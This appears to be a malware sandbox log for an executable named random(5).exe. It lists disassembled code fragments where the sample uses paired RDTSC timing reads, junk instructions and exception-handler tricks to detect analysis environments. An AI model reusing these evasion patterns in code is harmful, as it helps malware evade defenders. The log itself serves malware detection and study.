Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1741ECA second address: 1741ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173EEF1 second address: 173EEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1743DD3 second address: 1743E55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+1247EBADh], eax 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr [ebp+1245E71Ah], eax 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F519CD4C378h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 ja 00007F519CD4C37Bh 0x00000046 mov eax, dword ptr [ebp+122D07B1h] 0x0000004c xor dword ptr [ebp+122D1972h], eax 0x00000052 push FFFFFFFFh 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 je 00007F519CD4C37Ch 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1744C19 second address: 1744C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1741ECE second address: 1741ED4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1743E55 second address: 1743E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1741ED4 second address: 1741EDE instructions: 0x00000000 rdtsc 0x00000002 je 00007F519CD4C37Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1745B99 second address: 1745BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1746B68 second address: 1746B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1746B6C second address: 1746BE9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F519CFC89B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007F519CFC89C1h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F519CFC89B8h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 push 00000000h 0x0000004a mov bx, 14F8h 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 jc 00007F519CFC89C3h 0x00000057 jmp 00007F519CFC89BDh 0x0000005c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1746BE9 second address: 1746BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F519CD4C376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1747AF1 second address: 1747B4B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push esi 0x0000000b jl 00007F519CFC89B6h 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 nop 0x00000014 jnp 00007F519CFC89BCh 0x0000001a xor edi, 135C61F0h 0x00000020 push 00000000h 0x00000022 jne 00007F519CFC89BCh 0x00000028 push 00000000h 0x0000002a and bx, 747Fh 0x0000002f add dword ptr [ebp+122D1B7Eh], ecx 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jp 00007F519CFC89C6h 0x0000003e jmp 00007F519CFC89C0h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1746D81 second address: 1746D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1747CF3 second address: 1747CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1749D36 second address: 1749DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F519CD4C37Eh 0x0000000c nop 0x0000000d push esi 0x0000000e mov edi, 7C94D246h 0x00000013 pop ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F519CD4C378h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 sub edi, 183B8A94h 0x0000003b sub dword ptr [ebp+1247F3E8h], edi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov edi, dword ptr [ebp+122D3A1Fh] 0x0000004e mov eax, dword ptr [ebp+122D0921h] 0x00000054 mov dword ptr [ebp+12451724h], ebx 0x0000005a push FFFFFFFFh 0x0000005c mov bx, 8240h 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1749DAA second address: 1749DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 174AE45 second address: 174AE4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1749DAF second address: 1749DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 174AEE9 second address: 174AEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 174AEED second address: 174AEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 174CEAF second address: 174CEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 174FC69 second address: 174FC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F519CFC89C6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1755745 second address: 175576D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F519CD4C376h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CD4C386h 0x00000011 jg 00007F519CD4C376h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1758E1D second address: 1758E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F519CFC89BEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1759123 second address: 1759129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 175DC81 second address: 175DC91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 175DD62 second address: 175DD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F519CD4C37Dh 0x0000000b pop ecx 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F519CD4C37Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 175DD8C second address: 175DD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17660AD second address: 17660B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1764C4C second address: 1764C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 176553F second address: 176554B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F519CD4C376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17656EA second address: 17656F8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17656F8 second address: 1765723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F519CD4C37Eh 0x0000000f jnp 00007F519CD4C376h 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007F519CD4C376h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1765723 second address: 1765729 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1765729 second address: 176573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007F519CD4C382h 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17658D5 second address: 17658F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17658F0 second address: 17658FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F519CD4C376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17658FA second address: 1765938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a jmp 00007F519CFC89C1h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edi 0x00000012 pushad 0x00000013 jmp 00007F519CFC89BEh 0x00000018 jmp 00007F519CFC89BDh 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1765A8E second address: 1765A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1765A94 second address: 1765ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F519CFC89B6h 0x0000000a jmp 00007F519CFC89C6h 0x0000000f popad 0x00000010 jo 00007F519CFC89BCh 0x00000016 jl 00007F519CFC89B6h 0x0000001c pushad 0x0000001d jns 00007F519CFC89B6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1765ACA second address: 1765AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1765C26 second address: 1765C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1765C2C second address: 1765C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1765D8D second address: 1765DA3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F519CFC89BEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1765EF3 second address: 1765EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F519CD4C376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1765EFD second address: 1765F41 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F519CFC89C3h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 jc 00007F519CFC89C4h 0x00000017 jmp 00007F519CFC89BCh 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 jmp 00007F519CFC89BDh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 176AA8E second address: 176AA9A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F519CD4C376h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 176AEC9 second address: 176AED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 176AFF7 second address: 176AFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 176AFFB second address: 176B007 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F519CFC89B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 176B007 second address: 176B013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F519CD4C376h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 176B3D3 second address: 176B3EC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F519CFC89BCh 0x00000010 je 00007F519CFC89B6h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 176B9B2 second address: 176B9BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 176B9BC second address: 176B9D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F519CFC89C2h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 176B9D7 second address: 176B9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17726D8 second address: 17726F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jmp 00007F519CFC89BCh 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e js 00007F519CFC89BEh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1772C55 second address: 1772C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C384h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1775F3D second address: 1775F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F519CFC89B6h 0x0000000a jl 00007F519CFC89B6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 16EAFF9 second address: 16EB021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C381h 0x00000009 jmp 00007F519CD4C383h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1732F84 second address: 1732F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1732F9E second address: 1732FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1732FA4 second address: 1732FA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17330E0 second address: 17330E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17330E7 second address: 17330FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007F519CFC89B6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17330FC second address: 1733102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173331D second address: 1733321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1733321 second address: 173332D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173332D second address: 1733331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173342C second address: 1733435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1733435 second address: 1733439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1733439 second address: 17334B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D28DBh], esi 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F519CD4C378h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1C26h], ebx 0x00000033 nop 0x00000034 pushad 0x00000035 je 00007F519CD4C37Ch 0x0000003b ja 00007F519CD4C376h 0x00000041 pushad 0x00000042 push edi 0x00000043 pop edi 0x00000044 jmp 00007F519CD4C389h 0x00000049 popad 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17334B9 second address: 17334BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17334BF second address: 17334C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17334C4 second address: 17334CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17334CA second address: 17334CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173388D second address: 1733891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1733891 second address: 1733895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 177E906 second address: 177E90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 177E90C second address: 177E916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 177E916 second address: 177E91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 177E91A second address: 177E923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 177E923 second address: 177E936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F519CFC89B6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 177EA9A second address: 177EAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C37Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 177EDE3 second address: 177EE08 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F519CFC89B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F519CFC89C4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1781632 second address: 178163A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 178163A second address: 1781658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F519CFC89C3h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
